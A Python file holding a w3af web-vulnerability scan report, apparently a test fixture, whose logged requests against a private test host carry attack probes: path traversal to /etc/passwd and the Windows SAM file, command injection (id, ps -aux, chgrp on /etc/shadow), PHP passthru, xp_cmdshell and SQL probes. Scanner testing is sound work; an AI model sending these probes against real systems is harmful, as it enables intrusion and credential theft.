# -*- coding: UTF-8 -*-
report_medium = r"""<w3af-run start="1432118060" start-long="Wed May 20 12:34:20 2015" version="2.1">
    <w3af-version>w3af - Web Application Attack and Audit Framework
Version: 1.6.51
Revision: unknown
Branch: unknown
Local changes: No
Author: Andres Riancho and the w3af team.</w3af-version>
    <scan-info target="http://10.12.68.43:31337/">
        <audit>
            <plugin name="file_upload">
                <config parameter="extensions" value="[u'gif', u'html']"/>
            </plugin>
            <plugin name="eval">
                <config parameter="use_time_delay" value="True"/>
                <config parameter="use_echo" value="True"/>
            </plugin>
            <plugin name="un_ssl"/>
            <plugin name="os_commanding"/>
            <plugin name="lfi"/>
            <plugin name="sqli"/>
            <plugin name="preg_replace"/>
            <plugin name="phishing_vector"/>
            <plugin name="generic">
                <config parameter="diff_ratio" value="0.35"/>
            </plugin>
            <plugin name="format_string"/>
            <plugin name="ldapi"/>
            <plugin name="redos"/>
            <plugin name="global_redirect"/>
            <plugin name="xpath"/>
            <plugin name="cors_origin">
                <config parameter="origin_header_value" value="http://w3af.org/"/>
            </plugin>
            <plugin name="htaccess_methods"/>
            <plugin name="dav"/>
            <plugin name="ssi"/>
            <plugin name="csrf"/>
            <plugin name="xss">
                <config parameter="persistent_xss" value="True"/>
            </plugin>
            <plugin name="ssl_certificate">
                <config parameter="minExpireDays" value="30"/>
                <config parameter="caFileName" value="w3af/plugins/audit/ssl_certificate/ca.pem"/>
            </plugin>
            <plugin name="xst"/>
            <plugin name="blind_sqli">
                <config parameter="eq_limit" value="0.9"/>
            </plugin>
            <plugin name="mx_injection"/>
            <plugin name="response_splitting"/>
            <plugin name="rfi">
                <config parameter="listen_address" value=""/>
                <config parameter="listen_port" value="44449"/>
                <config parameter="use_w3af_site" value="True"/>
            </plugin>
            <plugin name="frontpage"/>
        </audit>
        <infrastructure>
            <plugin name="find_vhosts"/>
            <plugin name="afd"/>
            <plugin name="detect_transparent_proxy"/>
            <plugin name="allowed_methods">
                <config parameter="execOneTime" value="True"/>
                <config parameter="reportDavOnly" value="True"/>
            </plugin>
            <plugin name="shared_hosting"/>
            <plugin name="fingerprint_WAF"/>
            <plugin name="server_header"/>
            <plugin name="php_eggs"/>
            <plugin name="favicon_identification"/>
            <plugin name="frontpage_version"/>
            <plugin name="http_vs_https_dist">
                <config parameter="httpPort" value="80"/>
                <config parameter="httpsPort" value="443"/>
            </plugin>
            <plugin name="dns_wildcard"/>
            <plugin name="detect_reverse_proxy"/>
            <plugin name="hmap">
                <config parameter="gen_fingerprint" value="False"/>
            </plugin>
            <plugin name="domain_dot"/>
            <plugin name="fingerprint_os"/>
            <plugin name="server_status"/>
            <plugin name="find_jboss"/>
            <plugin name="halberd"/>
        </infrastructure>
        <bruteforce/>
        <grep>
            <plugin name="symfony">
                <config parameter="override" value="False"/>
            </plugin>
            <plugin name="file_upload"/>
            <plugin name="wsdl_greper"/>
            <plugin name="form_autocomplete"/>
            <plugin name="http_in_body"/>
            <plugin name="svn_users"/>
            <plugin name="xss_protection_header"/>
            <plugin name="private_ip"/>
            <plugin name="motw"/>
            <plugin name="code_disclosure"/>
            <plugin name="blank_body"/>
            <plugin name="path_disclosure"/>
            <plugin name="strange_http_codes"/>
            <plugin name="credit_cards"/>
            <plugin name="cache_control"/>
            <plugin name="dom_xss"/>
            <plugin name="cross_domain_js">
                <config parameter="secure_js_file" value="w3af/plugins/grep/cross_domain_js/secure-js-sources.txt"/>
            </plugin>
            <plugin name="html_comments"/>
            <plugin name="http_auth_detect"/>
            <plugin name="strange_parameters"/>
            <plugin name="oracle"/>
            <plugin name="dot_net_event_validation"/>
            <plugin name="objects"/>
            <plugin name="error_500"/>
            <plugin name="meta_tags"/>
            <plugin name="lang"/>
            <plugin name="click_jacking"/>
            <plugin name="directory_indexing"/>
            <plugin name="password_profiling"/>
            <plugin name="get_emails">
                <config parameter="only_target_domain" value="True"/>
            </plugin>
            <plugin name="hash_analysis"/>
            <plugin name="url_session"/>
            <plugin name="error_pages"/>
            <plugin name="strange_reason"/>
            <plugin name="user_defined_regex">
                <config parameter="single_regex" value=""/>
                <config parameter="regex_file_path" value=""/>
            </plugin>
            <plugin name="strange_headers"/>
            <plugin name="ssn"/>
            <plugin name="feeds"/>
            <plugin name="analyze_cookies"/>
        </grep>
        <evasion/>
        <output>
            <plugin name="html_file">
                <config parameter="template" value="w3af/plugins/output/html_file/templates/complete.html"/>
                <config parameter="output_file" value="current.site.html"/>
                <config parameter="verbose" value="False"/>
            </plugin>
            <plugin name="text_file">
                <config parameter="verbose" value="True"/>
                <config parameter="output_file" value="current.site.txt"/>
                <config parameter="http_output_file" value="current.site.html"/>
            </plugin>
            <plugin name="console">
                <config parameter="verbose" value="False"/>
            </plugin>
            <plugin name="xml_file">
                <config parameter="output_file" value="current.site.xml"/>
            </plugin>
        </output>
        <mangle/>
        <crawl>
            <plugin name="web_spider">
                <config parameter="only_forward" value="False"/>
                <config parameter="follow_regex" value=".*"/>
                <config parameter="ignore_regex" value=""/>
            </plugin>
            <plugin name="robots_txt"/>
            <plugin name="digit_sum"/>
            <plugin name="url_fuzzer"/>
            <plugin name="content_negotiation"/>
        </crawl>
        <auth/>
    </scan-info>
    <vulnerability id="[131, 18, 37, 41, 172, 55, 58, 60, 62, 65, 68, 69, 71, 72, 203, 76, 77, 205, 208, 209, 211, 213, 214, 215, 217, 207, 99, 100, 104, 126]" method="GET" name="Strange header" plugin="strange_headers" severity="Information" url="http://10.12.68.43:31337/" var="None">
        <description>The remote web server sent 18 HTTP responses with the uncommon response header &quot;host&quot;, one of the received header values is &quot;10.12.68.43:31337&quot;. The first ten URLs which sent the uncommon header are:
 - http://10.12.68.43:31337/admin-console/
 - http://10.12.68.43:31337/web-console/ServerInfo.jsp
 - http://10.12.68.43:31337/status
 - http://10.12.68.43:31337/10.tgz
 - http://10.12.68.43:31337/
 - http://10.12.68.43:31337/10.cab
 - http://10.12.68.43:31337/_vti_bin/_vti_aut/author.dll
 - http://10.12.68.43:31337/invoker/JMXInvokerServlet
 - http://10.12.68.43:31337/WebConsole/Invoker
 - http://10.12.68.43:31337/10.12.tar.gz
</description>
        <http-transactions>
            <http-transaction id="131">
                <http-request>
                    <status>POST http://10.12.68.43:31337/_vti_bin/_vti_aut/author.dll HTTP/1.1</status>
                    <headers>
                        <header content="158" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWV0aG9kPXB1dCBkb2N1bWVudDo0LjAuMi40NzE1JnNlcnZpY2VfbmFtZT0mZG9jdW1lbnQ9W2Rv
Y3VtZW50X25hbWU9L0FLcFBlLmh0bWw7bWV0YV9pbmZvPVtdXSZwdXRfb3B0aW9uPW92ZXJ3cml0
ZSZjb21tZW50PSZrZWVwX2NoZWNrZWRfb3V0PWZhbHNlCmxtdGguZVBwS0E=
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_bin/_vti_aut/author.dll&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="18">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="37">
                <http-request>
                    <status>PUT http://10.12.68.43:31337/ojGra HTTP/1.1</status>
                    <headers>
                        <header content="6" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="text/plain" field="Content-type"/>
                    </headers>
                    <body content-encoding="text">cCkAuQ</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about ojGra has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='ojGra'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="41">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?IGv23Rj=xfiehPu HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="172">
                <http-request>
                    <status>GET http://10.12.68.43:31337/robots.txt HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/robots.txt&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="55">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?IGv23Rj=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="58">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?IGv23Rj=.%2F..%2F..%2F..%2Fetc%2Fmotd%00html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="60">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?IGv23Rj=id&amp;uname%20-a= HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="62">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?IGv23Rj=%3C%3F%20passthru%28%22id%22%29&amp;%3F%3E= HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="65">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?IGv23Rj=..%2F..%2FWINNT%2Fsystem32%2Fcmd.exe%3Fdir%20c%3A%5C HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="68">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?IGv23Rj=type%20c%3A%5Cwinnt%5Crepair%5Csam._ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="69">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?IGv23Rj=ps%20-aux HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="71">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?IGv23Rj=..%2F..%2F..%2F..%2Fbin%2Fchgrp%20nobody%20%2Fetc%2Fshadow%7C HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="72">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?IGv23Rj=SELECT%20TOP%201%20name%20FROM%20sysusers HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="203">
                <http-request>
                    <status>GET http://10.12.68.43:31337/admin-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about admin-console/ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='admin-console/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="76">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?IGv23Rj=exec%20master..xp_cmdshell%20dir HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="77">
                <http-request>
                    <status>GET http://10.12.68.43:31337/?IGv23Rj=exec%20xp_cmdshell%20dir HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="205">
                <http-request>
                    <status>GET http://10.12.68.43:31337/jmx-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about jmx-console/ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='jmx-console/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="208">
                <http-request>
                    <status>GET http://10.12.68.43:31337/web-console/ServerInfo.jsp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/web-console/ServerInfo.jsp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="209">
                <http-request>
                    <status>GET http://10.12.68.43:31337/WebConsole/Invoker HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about WebConsole/Invoker has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='WebConsole/Invoker'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="211">
                <http-request>
